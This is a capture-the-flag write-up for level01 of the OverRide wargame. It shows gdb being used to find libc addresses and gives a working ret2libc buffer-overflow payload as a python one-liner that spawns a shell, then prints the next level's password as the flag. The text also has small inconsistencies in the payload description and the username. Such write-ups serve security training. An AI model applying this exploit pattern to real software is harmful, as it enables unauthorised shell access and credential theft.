After login we see next inforamtion.
```
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/users/level01/level01
```

As we can see this binary has a buffer-overflow problem, so I will use it to call `system("/bin/bash/")`. First I will pass `dat_wil` as first input - user name. In the second argument, I need to pass a payload of 78 bytes length and `system` function address and `/bin/sh` string address after.

Using `gdb` found `system` and `/bin/sh` address.
```
(gdb) p *system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) find &system, +9999999,"/bin/sh
Unterminated string in expression.
(gdb) find &system, +9999999,"/bin/sh"
0xf7f897ec
warning: Unable to access target memory at 0xf7fd3b74, halting search.
1 pattern found.
```

`system` function address: `0xf7e6aed0 -> D0AEE6F7`
`/bin/sh` string address: `0xf7f897ec -> EC97F8F7`

Exploit:
```
level01@OverRide:~$ python -c "print 'dat_will' + '\xA0' + 'A' * 248 + 'B' * 78 + '\xD0\xAE\xE6\xF7' + 'DDDD' + '\xEC\x97\xF8\xF7'" > /tmp/level01
level01@OverRide:~$ cat /tmp/level01 - | ./level01
********* ADMIN LOGIN PROMPT *********
Enter Username: verifying username....

Enter Password:
nope, incorrect password...

cat /home/users/level02/.pass
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
```

Flag: `PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv`